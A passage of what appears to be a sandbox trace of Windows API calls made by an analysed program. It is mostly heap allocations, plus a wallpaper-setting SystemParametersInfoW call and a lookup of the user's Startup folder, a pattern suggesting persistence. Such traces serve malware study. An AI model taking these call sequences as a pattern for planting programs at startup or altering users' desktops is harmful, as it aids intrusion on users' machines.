hHeap=0x2af0000) returned 1 [0264.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0264.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0264.278] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0264.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0264.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0264.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0264.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0264.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0264.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0264.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0264.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0264.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0264.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0264.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0264.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0264.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0264.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0264.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0264.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0264.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0264.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0264.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0264.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0264.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0264.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0264.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0264.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0264.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0264.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0264.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0264.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0264.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0264.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0264.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0264.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0264.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0264.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0264.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0264.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0264.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0264.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0264.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0264.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0264.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0264.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0264.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0264.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0264.280] LoadLibraryW (lpLibFileName="user32.dll") returned 0x76240000 [0264.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0264.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0264.281] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0264.281] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x16) returned 0x29f7160 [0264.281] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x29f7160, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0264.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0264.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0264.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7160 | out: hHeap=0x2af0000) returned 1 [0264.283] GetProcAddress (hModule=0x76240000, lpProcName="SystemParametersInfoW") returned 0x7626f210 [0264.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0264.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0264.283] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0264.283] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0264.283] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0264.283] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0264.283] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0264.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0264.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0264.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0264.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0264.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0264.285] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0264.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x3865490 [0264.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f20 [0264.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0264.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0264.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0264.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0264.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0264.444] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0264.444] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0264.444] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0264.444] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0264.444] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0264.444] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0264.444] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0264.444] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0264.444] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0264.444] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0264.444] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0264.444] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0264.444] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0264.444] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0264.444] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0264.444] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0264.444] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0264.444] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0264.444] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0264.445] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0264.445] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0264.445] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0264.445] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0264.445] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0264.445] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0264.445] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0264.445] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0264.445] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0264.445] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0264.445] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0264.445] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0264.448] FreeLibrary (hLibModule=0x76240000) returned 1 [0264.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0264.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0264.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0264.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0264.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0264.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0264.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0264.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0264.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0264.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0264.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0264.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0264.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0264.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0264.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0264.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0264.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0264.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0264.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0264.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0264.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0264.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0264.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0264.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0264.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0264.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0264.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0264.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0264.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0264.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0264.452] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x3865040 [0264.452] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0264.452] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0264.455] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3865490 | out: hHeap=0x2af0000) returned 1 [0264.455] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.458] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0264.458] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0264.458] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.458] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0264.458] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0264.458] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0264.459] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0264.459] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0264.459] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0264.459] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0264.459] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0264.459] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0264.459] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0264.459] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0264.459] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0264.459] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0264.459] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0264.459] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0264.459] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0264.459] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0264.460] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0264.460] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0264.460] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0264.460] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0264.460] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0264.460] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0264.460] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0264.460] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0264.460] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0264.460] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f20 | out: hHeap=0x2af0000) returned 1 [0264.460] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0264.460] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3865040 | out: hHeap=0x2af0000) returned 1 [0264.460] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0264.460] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0264.460] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0264.460] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0264.460] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0264.460] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0264.460] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0264.460] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0264.460] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0264.460] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0264.460] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0264.460] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0264.460] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0264.460] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0264.461] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0264.461] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0264.461] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0264.461] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0264.461] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0264.461] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0264.461] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0264.461] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0264.461] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0264.461] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0264.461] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0264.461] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0264.461] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0264.461] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0264.461] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0264.461] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0264.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0264.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0264.462] CharUpperBuffW (in: lpsz="StartupDir", cchLength=0xa | out: lpsz="STARTUPDIR") returned 0xa [0264.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0264.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0264.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab638 [0264.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0264.462] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0264.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab458 [0264.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0264.462] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x8cf298 | out: pszPath="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0264.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0264.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa0) returned 0x2a683a8 [0264.463] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0264.464] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0264.464] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0264.464] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0264.464] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0264.464] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0264.464] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0264.464] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0264.464] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0264.464] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0264.464] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 